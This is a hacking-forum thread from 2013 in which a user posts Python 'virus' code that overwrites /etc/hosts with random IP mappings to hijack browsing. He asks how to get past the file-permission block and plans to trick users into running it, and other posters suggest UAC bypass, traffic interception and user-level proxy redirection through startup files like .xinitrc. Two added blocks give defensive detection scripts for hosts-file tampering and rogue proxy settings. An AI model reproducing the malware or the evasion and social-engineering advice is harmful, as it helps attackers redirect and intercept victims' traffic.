
Author Topic: [Python] Ultimate Redirector (Virus)  (Read 1566 times)


Offline parad0x

[Python] Ultimate Redirector (Virus)
« on: July 27, 2013, 11:59:15 AM »
Well, I got the idea of writing a virus that redirects you to a random IP: whenever you try to visit any site, you'll be redirected to a random website. I have written the code so far, but whenever I run this, it says, "You do not have permission to edit this file." I want to ask: how do I make this bypass this and write to this file?


Code: (Python)

import time
import random


def fake_ip():
    part1 = int(random.random() * 1000)
    part2 = int(random.random() * 1000)
    part3 = int(random.random() * 1000)
    part4 = int(random.random() * 1000)


    while part1 > 255:
        part1 = int(random.random() * 1000)


    while part2 > 255:
        part2 = int(random.random() * 1000)


    while part3 > 255:
        part3 = int(random.random() * 1000)


    while part4 > 254:
        part4 = int(random.random() * 1000)


    ip = str(part1) + "." + str(part2) + "." + str(part3) + "." + str(part4)


    return ip


def real_ip():
    i = 1
    start = time.time()
    file = open("/etc/hosts", 'w')
    print("Virus by parad0x\nInfecting...")
    while i < 2:
        if i == 2:
            break
        global ip
        ip = fake_ip()
        part2 = 0
        part3 = 0
        part4 = 0
        real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
   
        while part4 < 2:
            part4 += 1
            real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
            ip = fake_ip()
            file.write( ip + " " + real + "\n")
        while part3 < 2:
            part3 += 1
            part4 = 0
            while part4 < 2:
                part4 +=1
                real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
                ip = fake_ip()
                file.write(ip + " " + real + "\n")
       


        while part2 < 2:
            part2 += 1
            part3 = 0
            part4 = 0
            while part3 < 2:
                part3 += 1
                part4 = 0
                while part4 < 2:
                    part4 +=1
                    real  = str(i) + "." + str(part2) + '.' + str(part3)  + '.' + str(part4)
                    ip = fake_ip()
                    file.write(ip + " " + real + "\n")
        i += 1
    file.close()
    end = time.time()
    print("Infected!")
    print("Total time taken : " + str(end - start) + " seconds.")


def main():
    real_ip()


main()



Offline proxx

Re: [Python] Ultimate Redirector (Virus)
« Reply #1 on: July 27, 2013, 12:01:58 PM »
Attacking the hosts file is a very old and common method.
Windows protects it and so does any antivirus or the like.
The fact that it will blow all whistles and bells makes it useless.

Only an administrator can edit it.

It's good thinking, don't take me wrong.
« Last Edit: July 27, 2013, 12:04:30 PM by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage
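
A defender's view of the point made in the replies about the hosts file being protected and watched, as an added example that is not part of the original thread: a hosts file overwritten the way the posted script does it has an IP literal in the name field and no loopback entry for localhost, and the file itself should be owned by root and not group- or world-writable. The sample contents, `EXPECTED_LOOPBACK` and the function names are constructed for this example, which assumes a Linux host with /etc/hosts.

```python
import ipaddress
import os
import stat

EXPECTED_LOOPBACK = {"localhost"}  # assumption: names that must resolve to loopback

def parse_ip(token):
    try:
        return ipaddress.ip_address(token)
    except ValueError:
        return None

def audit_hosts(text):
    """Return (line_no, finding) pairs for suspicious hosts-file content."""
    findings, loopback_names = [], set()
    for no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()       # drop comments, tokenize
        if not fields:
            continue
        ip = parse_ip(fields[0])
        if ip is None:
            findings.append((no, f"invalid address {fields[0]!r}"))
            continue
        for name in fields[1:]:
            if parse_ip(name) is not None:          # shape the posted script writes
                findings.append((no, f"name field {name!r} is an IP literal"))
            elif ip.is_loopback:
                loopback_names.add(name.lower())
            elif name.lower() in EXPECTED_LOOPBACK:
                findings.append((no, f"{name} mapped to non-loopback {ip}"))
    for name in sorted(EXPECTED_LOOPBACK - loopback_names):
        findings.append((0, f"no loopback entry for {name}; file may have been overwritten"))
    return findings

def mode_findings(st_uid, st_mode):
    """Flag ownership or mode bits that let a non-root user edit the file."""
    out = ["not owned by root"] if st_uid != 0 else []
    if st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        out.append("group- or world-writable")
    return out

# Constructed samples: a normal file, and one shaped like the posted script's output.
CLEAN = "127.0.0.1 localhost\n::1 localhost ip6-localhost\n192.0.2.10 build.example.internal\n"
TAMPERED = "198.51.100.23 1.0.0.1\n203.0.113.77 1.0.0.2\n"

if __name__ == "__main__":
    print(audit_hosts(CLEAN), audit_hosts(TAMPERED))
    st = os.stat("/etc/hosts")                      # path discussed in the thread
    print(mode_findings(st.st_uid, st.st_mode))
```

Line number 0 in a finding marks a whole-file condition rather than a specific line.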

Offline Kulverstukas

Re: [Python] Ultimate Redirector (Virus)
« Reply #2 on: July 27, 2013, 02:24:59 PM »
Indeed this method is very old. If you want to get uber l33t, you can make it hook into the browser and analyze the traffic as it goes, modifying packets and redirecting stuff :P
I don't know how doable this is, but you can try :P look into ettercap filters for some ideas.

Offline vezzy

Re: [Python] Ultimate Redirector (Virus)
« Reply #3 on: July 27, 2013, 03:13:07 PM »
For Windows, if you find a way to get past UAC, this could be moderately useful, but as the previous posters said: old technique.
Quote from: Dippy hippy
Just brushing though. I will be semi active mainly came to find a HQ botnet, like THOR or just any p2p botnet

Offline proxx

Re: [Python] Ultimate Redirector (Virus)
« Reply #4 on: July 27, 2013, 04:28:22 PM »
Quote from: Kulverstukas
Indeed this method is very old. If you want to get uber l33t, you can make it hook into the browser and analyze the traffic as it goes, modifying packets and redirecting stuff :P
I don't know how doable this is, but you can try :P look into ettercap filters for some ideas.

As well as Paros proxy and Burp Suite.

Offline Thor

Re: [Python] Ultimate Redirector (Virus)
« Reply #5 on: July 30, 2013, 05:44:39 AM »
It is saying "You do not have permission to edit this file." because only superuser (root) can modify /etc/hosts.

If you run your script as root you shouldn't get this error.
They who can give up essential liberty to obtain a little temporary safety, deserve neither liberty nor safety.

Offline proxx

Re: [Python] Ultimate Redirector (Virus)
« Reply #6 on: July 30, 2013, 06:18:24 AM »
lmfao,
I assumed Windows for a second here :)

On Linux it's indeed true that you need to be root to edit the file.
Interestingly, sudo is by default not permitted to edit this.
I believe this is a distro-dependent issue; for example, Debian is much stricter when it comes to sec.
Correct me if I'm wrong here.


Offline parad0x

Re: [Python] Ultimate Redirector (Virus)
« Reply #7 on: August 01, 2013, 03:00:49 PM »
Quote from: proxx
Attacking the hosts file is a very old and common method.
Windows protects it and so does any antivirus or the like.
The fact that it will blow all whistles and bells makes it useless.

Only an administrator can edit it.

It's good thinking, don't take me wrong.

I won't take you wrong. Instead, I'll learn what Kulver said to make it a better (or worse for victims) virus.

I posted it to know what amendments I should do to make it better.

But Kulver, what you said is somewhat hard, don't you think?

Quote from: Thor
It is saying "You do not have permission to edit this file." because only superuser (root) can modify /etc/hosts.

If you run your script as root you shouldn't get this error.

I know this, dude. I asked as all *nix users don't use root all the time, only the administrator uses root.
But if I say it's a nice hacking tool and you need to run this, you won't ask the admin to run that thing, as he'll probably know what's there. ;)
« Last Edit: August 01, 2013, 03:03:22 PM by parad0x »

Offline proxx

Re: [Python] Ultimate Redirector (Virus)
« Reply #8 on: August 01, 2013, 03:13:57 PM »
Quote from: parad0x
I won't take you wrong. Instead, I'll learn what Kulver said to make it a better (or worse for victims) virus.

I posted it to know what amendments I should do to make it better.

But Kulver, what you said is somewhat hard, don't you think?

I know this, dude. I asked as all *nix users don't use root all the time, only the administrator uses root.
But if I say it's a nice hacking tool and you need to run this, you won't ask the admin to run that thing, as he'll probably know what's there. ;)

If you want to do user-based shit:
One is able to do certain proxy settings for a bash shell.
In fact you could apply that to the entire user space if it's run at startup.
Files like .xinitrc or some of the magic behind the GUI logins are writable by the regular user in most cases.
You could do something that lets all the requests made launch through that proxy.
To make it more fun you could take some basic proxy scripts (write own?) and have them relay that traffic to random IP addresses.

*Just throwing around some ideas*
« Last Edit: August 01, 2013, 03:14:42 PM by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage
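
For the per-user proxy settings described in the reply above, an added detection example (not code from the thread): it lists proxy variable assignments in user-writable startup files and marks those that point at a non-local host. The file list, the sample `.xinitrc` content and the function names are assumptions made for this example.

```python
import os
import re

PROXY_VARS = {"http_proxy", "https_proxy", "ftp_proxy", "all_proxy"}  # compared lowercased
STARTUP_FILES = (".xinitrc", ".xprofile", ".profile", ".bashrc", ".bash_profile")  # assumed list
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}
# NAME=value or "export NAME=value", optional quotes, optional trailing comment.
ASSIGN = re.compile(r"""^\s*(?:export\s+)?([A-Za-z_]\w*)=(["']?)(.*?)\2\s*(?:#.*)?$""")

def proxy_host(value):
    """Host part of a proxy value such as http://user@host:3128/ or [::1]:1080."""
    rest = value.split("://", 1)[-1].split("/", 1)[0].rsplit("@", 1)[-1]
    if rest.startswith("["):                      # bracketed IPv6 literal
        return rest[1:].split("]", 1)[0]
    return rest.rsplit(":", 1)[0]

def scan_startup_text(name, text):
    """Return one record per proxy assignment found in a startup file's text."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        m = ASSIGN.match(line)
        if not m or m.group(1).lower() not in PROXY_VARS:
            continue                              # comments and other variables
        host = proxy_host(m.group(3)).lower()
        hits.append({"file": name, "line": no, "var": m.group(1),
                     "value": m.group(3), "remote": host not in LOCAL_HOSTS})
    return hits

def scan_home(home):
    """Scan the startup files that exist under one home directory."""
    hits = []
    for rel in STARTUP_FILES:
        path = os.path.join(home, rel)
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                hits += scan_startup_text(path, fh.read())
    return hits

SAMPLE_XINITRC = """\
# constructed sample of a user-writable startup file
xsetroot -solid black
export http_proxy="http://198.51.100.9:8080"
HTTPS_PROXY=http://127.0.0.1:3128   # local cache
# export all_proxy=socks5://203.0.113.5:1080
exec openbox
"""

if __name__ == "__main__":
    for hit in scan_startup_text(".xinitrc", SAMPLE_XINITRC) + scan_home(os.path.expanduser("~")):
        print(hit)
```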

 


